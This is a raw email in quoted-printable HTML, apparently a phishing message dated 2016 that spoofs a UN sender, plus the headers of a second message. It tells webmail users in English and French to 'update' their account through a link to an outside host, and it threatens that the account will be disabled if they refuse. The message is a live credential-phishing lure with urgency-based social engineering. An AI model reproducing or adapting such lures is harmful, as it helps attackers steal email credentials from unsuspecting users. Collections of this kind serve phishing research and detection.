From: Tanimoune Arimai <arimai@un.org>
Message-ID: <OF4319CD7B.467671F7-ONC1257FA4.00173016-C1257FA4.0017308E@un.org>
Date: Fri, 29 Apr 2016 06:13:17 +0200
X-Mailer: Lotus Domino Web Server Release 9.0.1 October 14, 2013
X-MIMETrack: Serialize by HTTP Server on OCHA-BMAIL-02/OCHA/FD(Release 9.0.1|October 14, 2013) at
 04/29/2016 06:13:17 AM,
	Serialize complete at 04/29/2016 06:13:17 AM,
	Itemize by HTTP Server on OCHA-BMAIL-02/OCHA/FD(Release 9.0.1|October 14, 2013) at
 04/29/2016 06:13:17 AM,
	Serialize by Router on UN-MAILHUB-P-02/UNO(Release 9.0.1FP3|January  12, 2015) at
 04/29/2016 09:24:00 AM,
	Serialize complete at 04/29/2016 09:24:00 AM
Content-Transfer-Encoding: quoted-printable
Content-Type: text/html;
	charset=ISO-8859-1
Bcc: jose@monkey.org
X-Notes-Item: jose@monkey.org; name=AltBlindCopyTo
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 192

<font face=3D"Default Sans Serif,Verdana,Arial,Helvetica,sans-serif" size=
=3D"2"><font face=3D"Default Sans Serif,Verdana,Arial,Helvetica,sans-serif"=
 size=3D"2"><div align=3D"center"><span style=3D"" class=3D"systran=5Fseg" =
id=3D"Sp1.s2=5Fo"><span class=3D"systran=5Ftoken=5Fword" value=3D"2026/adj:=
base" id=3D"token=5F1">Dear</span> <span style=3D"" class=3D"systran=5Ftoke=
n=5Fword" value=3D"1011/noun:propernoun" id=3D"token=5F2">Users,</span></sp=
an><br><span style=3D"" class=3D"systran=5Fseg" id=3D"Sp1.s2=5Fo"><span sty=
le=3D"" class=3D"systran=5Ftoken=5Fword" value=3D"1011/noun:propernoun" id=
=3D"token=5F2"></span></span><br><span style=3D"" class=3D"systran=5Fseg" i=
d=3D"Sp1.s2=5Fo"><span style=3D"" class=3D"systran=5Ftoken=5Fword" value=3D=
"1011/noun:propernoun" id=3D"token=5F2"></span></span><span style=3D"" clas=
s=3D"systran=5Fseg" id=3D"Sp1.s2=5Fo"><span class=3D"systran=5Ftoken=5Fword=
" value=3D"2827/det" id=3D"token=5F1">Our</span> <span class=3D"systran=5Ft=
oken=5Fword" value=3D"1010/noun:common" id=3D"token=5F2">service</span> <sp=
an style=3D"" class=3D"systran=5Ftoken=5Fword" value=3D"0404/verb:plain" id=
=3D"token=5F3">updates</span> <span class=3D"systran=5Ftoken=5Fword" value=
=3D"2429/pron" id=3D"token=5F5">all</span> <span style=3D"" class=3D"systra=
n=5Ftoken=5Fword" value=3D"1010/noun:common" id=3D"token=5F7">users</span><=
/span>. <br><br><span style=3D"background-color: rgb(229, 245, 255);" class=
=3D"systran=5Fseg" id=3D"Sp1.s2=5Fo"><span style=3D"background-color: rgb(1=
85, 231, 253);" class=3D"systran=5Ftoken=5Fword" value=3D"7070/pron" id=3D"=
token=5F1">We</span> <span style=3D"" class=3D"systran=5Ftoken=5Fword" valu=
e=3D"0404/verb:plain" id=3D"token=5F3">ask</span> <span style=3D"" class=3D=
"systran=5Ftoken=5Fword" value=3D"7476/pron" id=3D"token=5F2">you</span> <s=
pan style=3D"" class=3D"systran=5Ftoken=5Fword" value=3D"4848/verb:inf*" id=
=3D"token=5F6">to update</span><span style=3D"" class=3D"systran=5Ftoken=5F=
word" value=3D"2827/det" id=3D"token=5F8"></span> <span class=3D"systran=5F=
token=5Fword" value=3D"5050/prep" id=3D"token=5F10">on</span> <span class=
=3D"systran=5Ftoken=5Fword" id=3D"token=5F0">the</span> <span class=3D"syst=
ran=5Ftoken=5Fword" value=3D"2020/adj:base" id=3D"token=5F13">following</sp=
an> <span class=3D"systran=5Ftoken=5Fword" value=3D"1010/noun:common" id=3D=
"token=5F12">link</span> <span class=3D"systran=5Ftoken=5Fword" value=3D"a8=
6a/part*" id=3D"token=5F14">in order to</span> <span class=3D"systran=5Ftok=
en=5Fword" value=3D"4848/verb:inf" id=3D"token=5F15">preserve</span> <span =
style=3D"" class=3D"systran=5Ftoken=5Fword" value=3D"2827/det" id=3D"token=
=5F16">your </span></span><span style=3D"background-color: rgb(229, 245, 25=
5);" class=3D"systran=5Fseg" id=3D"Sp1.s2=5Fo"><span style=3D"" class=3D"sy=
stran=5Ftoken=5Fword" value=3D"1010/noun:common" id=3D"token=5F9">webmail.<=
br><br></span></span><span style=3D"background-color: rgb(229, 245, 255);" =
class=3D"systran=5Fseg" id=3D"Sp1.s2=5Fo"><span style=3D"" class=3D"systran=
=5Ftoken=5Fword" value=3D"1010/noun:common" id=3D"token=5F9"></span></span>=
<a target=3D"=5Fblank" href=3D"http://unverdp.esy.es" title=3D"http://unver=
dp.esy.es">CLIK-HERE</a><br><span style=3D"background-color: rgb(229, 245, =
255);" class=3D"systran=5Fseg" id=3D"Sp1.s2=5Fo"><span style=3D"background-=
color: rgb(185, 231, 253);" class=3D"systran=5Ftoken=5Fword" value=3D"5050/=
prep*" id=3D"token=5F1"><br>In the event of</span> <span style=3D"" class=
=3D"systran=5Ftoken=5Fword" value=3D"1010/noun:common" id=3D"token=5F2">ref=
usal</span> <span style=3D"" class=3D"systran=5Ftoken=5Fword" value=3D"5054=
/prep" id=3D"token=5F3">of</span> <span style=3D"" class=3D"systran=5Ftoken=
=5Fword" value=3D"2827/det" id=3D"token=5F4">your</span> <span style=3D"" c=
lass=3D"systran=5Ftoken=5Fword" value=3D"1010/noun:common" id=3D"token=5F5"=
>update</span><span style=3D"" class=3D"systran=5Ftoken=5Fpunctuation" id=
=3D"token=5F7">,</span> <span class=3D"systran=5Ftoken=5Fword" value=3D"282=
7/det" id=3D"token=5F8">your</span> webmail<span style=3D"" class=3D"systra=
n=5Ftoken=5Fword" value=3D"1010/noun:common" id=3D"token=5F9"></span> <span=
 style=3D"" class=3D"systran=5Ftoken=5Fword" value=3D"0438/verb:plain*" id=
=3D"token=5F12"><span class=3D"systran=5Fud" value=3D"<set>systranLinks,-35=
,-,100</set><choice value=3D'systranLinks,-35,-,100' selected=3D'yes'/>" id=
=3D"ud=5F2">will be automatically disabled</span></span></span><a href=3D"h=
ttp://unverdp.esy.es/" target=3D"=5Fblank">.</a><br>-----------------------=
------------------------------<br></div><p align=3D"center">Chers Utilisate=
urs&nbsp;</p>=0D<p align=3D"center">Notre service met =E0 jour tout les uti=
lisateurs&nbsp;</p>=0D<p align=3D"center">Cependant, nous vous demandons de=
 vous mettre =E0 jour votre messagerie sur le lien suivant afin de conserve=
r votre messagerie</p>=0D<p align=3D"center"><a href=3D"http://unverdp.esy.=
es/" target=3D"=5Fblank"> ACC=C9DEZ ICI </a></p>=0D<p align=3D"center">En c=
as de refus de votre mise a jour, votre messagerie sera automatiquement d=
=E9sactiv=E9e</p></font><div></div></font>

From jose@monkey.org Sat Apr 30 12:40:02 2016 +0000
Return-Path: test@lightworld.co.jp
Delivered-To: jose@monkey.org
X-FDA: 71462801844.03.cent06_53202798620
X-Spam-Summary: 85,1,0,a308fe4d50b31c78,d41d8cd98f00b204,test@lightworld.co.jp,:,RULES_HIT:41:46:72:150:152:375:379:800:967:969:973:983:988:989:1185:1208:1224:1254:1260:1263:1311:1313:1314:1381:1431:1437:1514:1515:1516:1517:1534:1539:1567:1593:1594:1699:1711:1714:1730:1747:1777:1792:2393:2525:2549:2561:2564:2682:2685:2859:2890:2892:2900:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3740:3865:3866:3867:3868:3870:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4250:5007:6119:6684:6688:7652:8599:8797:9025:9908:10004:10346:10400:10429:10430:10431:11638:11639:11658:11914:11984:12043:12050:12051:12217:12517:12519:12532:12955:12958:13311:13357:14036:14037:14181:14384:14714:14721:19903:19997:21067:21080:21433:30001:30022:30038:30054:30055:30069:30070:30075:30080,0,RBL:220.216.111.23-irl.urbl.hostedemail.com-127.0.0.175,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fp,MSBL:0,DNSBL:neutral,Custom_rules:0:1:0,LFtime:
X-HE-Tag: cent06_53202798620
X-Filterd-Recvd-Size: 1976
Received: from 32.pro.tok2.com (32.pro.tok2.com [220.216.111.23])
	by imf02.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Sat, 30 Apr 2016 12:40:02 +0000 (UTC)
Received: from [74.208.98.38] (port=58115 helo=s17039839)
	by 32.pro.tok2.com with esmtpa (Exim 4.84)
	(envelope-from <test@lightworld.co.jp>)
	id 1auibG-0000bM-5n
	for jose@monkey.org; Tue, 26 Apr 2016 00:39:02 +0900
MIME-Version: 1.0
